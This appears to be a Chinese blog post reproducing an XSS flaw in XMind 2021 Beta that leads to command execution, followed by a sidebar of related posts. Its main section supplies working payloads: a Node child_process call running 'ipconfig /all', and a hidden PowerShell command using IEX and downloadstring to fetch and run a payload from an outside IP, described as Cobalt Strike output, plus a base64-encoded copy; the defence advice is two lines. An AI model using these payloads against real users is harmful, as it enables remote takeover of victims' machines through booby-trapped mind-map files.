XMind XSS漏洞导致命令执行

最新推荐文章于 2024-04-28 13:46:58 发布
最新推荐文章于 2024-04-28 13:46:58 发布
阅读量1.3k 收藏
点赞数
文章标签: xmind xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41770175/article/details/132974142
版权

0x01 XMind 介绍 :

XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行

XMind是一种功能齐全的思维导图和头脑风暴工具,旨在产生想法,激发创造力,并在工作和生活中带来效率。数以百万计的用户们喜欢它。
2021年5月10日, Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。

0x02下载地址

XMind 2021 v11.0.0 Beta 1 x64 官方版 for Windowshttps://dl2.xmind.cn/XMind-2021-for-Windows-64bit-11.0.0-Beta1-202105061920.exe

0x03漏洞利用方式:

选择事件型XSS需要附带onerror事件,比如img、audio等。

测试 弹窗代码:

构造命令执行payload

require('child_process').exec('ipconfig /all',(error, stdout, stderr)=>{
alert(stdout: ${stdout});
});

最终利用代码:

反弹shell命令

CS生成powershell脚本

原始代码:
require('child_process').exec('powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:// 172.22.32.25:8080/a''))"',(error, stdout, stderr)=>{
alert(stdout: ${stdout});
});

代码base64加密:
cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLyAxNzIuMjIuMzIuMjU6ODA4MC9hJ1wnKSkiJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7Cg==
最终插入代码:

0x05 预防:

升级到最新版本
谨慎打开Xmind

PeiSylon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nmap命令集.xmind
03-30
用思维导图做的nmap命令
Xmind 2020 XSS漏洞导致命令执行漏洞复现
Jaky5320的博客
05-10 284
0x00简介:       XMind是一个挺不错的思维导图软件,某数字漏洞云公众号在今天2021-05-10 10:22:29发布了漏洞预警信息,我立马找复现环境。下载地址:https://www.xmind.cn/0x01:复现:环境:1、XSS复现2、命令执行漏洞复现:0x02:预防:       1、升级到最新版本    2、谨慎打开Xmind &nb
Xmind2020存在XSS导致命令执行漏洞复现
m0_48520508的博客
05-19 472
0x00介绍 XMind 是一款非常实用的商业思维导图软件,应用全球最先进的Eclipse RCP 软件架构,全力打造易用、高效的可视化思维软件,强调软件的可扩展、跨平台、稳定性和性能,致力于使用先进的软件技术帮助用户真正意义上提高生产率。 0x01漏洞概述 该漏洞可以花样构造相关参数,执行系统命令,获取用户权限,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害 0x02影响版本 Xmind 2020 0x03环境搭建 1、下载漏洞环境,使用软件为xmind2020版本,可自.
XMind 2020 xss漏洞导致远程代码执行
jelly
05-14 478
0x00 简介 2021年5月10日,360漏洞云监测到Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。 影响版本: XMind 2020/2021 beat版本 0x01 复现环境 系统:普通的 win10 XMind 版本:XMind-2021-for-Windows-64bit-11.0.0-Beta1-202105061920 此外还测试了 XMind 2020 windows和macOS 版本均存在该漏洞。 复现记录时间:2021
漏洞复现】XMind2020及2021beta版本存在xss漏洞导致任意代码执行
Kris__zhang的博客
05-11 1936
简介 XMind是一种功能齐全的思维导图和头脑风暴工具,旨在产生想法,激发创造力,并在工作和生活中带来效率。数以百万计的用户们喜欢它 漏洞xssXMind2020及2021beta版本存在xss漏洞导致任意代码执行,可直接拿到目标主机权限 下载 官方连接: https://www.xmind.cn/download/ https://www.xmind.cn/xmind2021/beta/ 漏洞复现 XMind2020 【xss】 payload:<audio src=x onerror=co
ADB命令.xmind
01-13
最全的adb命令大全
新手必须掌握的Linux命令.xmind
05-08
Linux新手必须掌握的命令,学习Linux命令执行方法,通过合理地组合适当的命令与参数,来更精准地满足工作需求,迅速得到自己想要的结果,还可以尽可能地降低系统资源消耗,为今后学习更复杂的命令和服务做好必备...
Linux命令.xmind
12-06
Linux命令思维导图-Xmind
Linux命令学习.xmind
08-12
Linux命令学习思维导图。
Mac思维导图软件Xmind for Mac中文激活版
macw_q的博客
08-13 511
好的思维导图软件能帮助用户更好的发挥创作能力,XMind是一款流行的思维导图软件,可以帮助用户创建各种类型的思维导图和概念图。强大的功能和工具:XMind拥有多种强大的功能和工具,如标签、注释、关系、图像等,可以方便地创建和编辑导图。多样化的导图类型:XMind提供了多种类型的导图,如鱼骨图、树形图、机构图等,可以满足不同用户的需求。
云服务器搭建XSS-platform、DVWA靶机和Permeate论坛
weixin_44371842的博客
04-24 529
我发现目前网上的xss-platform的搭建教程都是基于本地搭建的,这样搭建好的xss平台只能在本地使用,无法测试别的网站。而网络上的大部分xss平台又几乎都是收费的,所以写这篇博客记录一下在服务器上搭建xss-platform的过程,并且顺带搭建了DVWA靶机和一个网络安全论坛。这次部署一共有三个系统,分别是xss-platform,dvwa靶机系统和permeate论坛。
Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识
JINGWHALE
04-22 1170
本文介绍了Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识。Web前端作为与用户直接交互的界面,其安全性问题直接关系到用户体验和数据安全。近年来,随着前端技术的快速发展,Web前端安全问题也日益凸显。因此,加强生产安全意识,深入理解并防范前端安全问题,对于保障整个Web应用的安全性至关重要。
判断前端入参是否空否则提示前端写法
最新发布
qq_39306234的博客
04-28 231
前端先声明一个变量,用于alert判断。在templeat中定义一个提示语句。然后在点击事件时判断一下是否展示。
vue实现录音并转文字功能,包括PC端web,手机端web
byebukesi的博客
04-26 520
不止vue,不限技术栈,vue2、vue3、react、.net以及原生js均可实现。
2024 XYCTF Web 方向 wp 全解
qq_39947980的博客
04-27 986
XYCTF 2024 Web 方向全解
两个前端标签
ma_no_lo的博客
04-24 177
两个前端标签
前端Vue2项目搭建过程
xuemen11的博客
04-25 1219
vue2,vuex,vant组件库
docker部署前端项目(二)遇到的问题
weixin_45379180的博客
04-25 401
原因: 安装docker的时候使用的是 yum -y install docker 命令,这个命令安装的是老版本。报错四:conflicts with file from package docker-common。因为使用 sudo yum install docker (下载到的是旧版)missing signature key 缺少秘钥。yum remove docker 删除docker。1、docker版本号 只有1.13.1。解决:可能是docker 未启用。
ubuntu xmind
09-09
您好!关于在Ubuntu上安装XMind,请按照以下步骤进行操作: 1. 首先,确保您的系统已经安装了Java运行环境。在终端中输入以下命令来检查是否已经安装了Java: ``` java -version ``` 如果显示了Java的版本信息,则已经安装了Java。否则,请使用以下命令安装Java: ``` sudo apt-get install default-jre ``` 2. 访问XMind官方网站(https://www.xmind.net/)并下载适用于Linux的XMind安装包。通常情况下,它会以压缩文件(.tar.gz)的形式提供。 3. 在终端中导航到下载的XMind安装包所在的目录。使用以下命令解压缩该文件: ``` tar -xvf xmind-*.tar.gz ``` 4. 进入解压缩后的XMind目录: ``` cd xmind-* ``` 5. 最后,运行XMind启动脚本以启动应用程序: ``` ./XMind ``` 这样,您就可以在Ubuntu上成功安装并运行XMind了。希望对您有帮助!如果您有任何其他问题,请随时向我提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值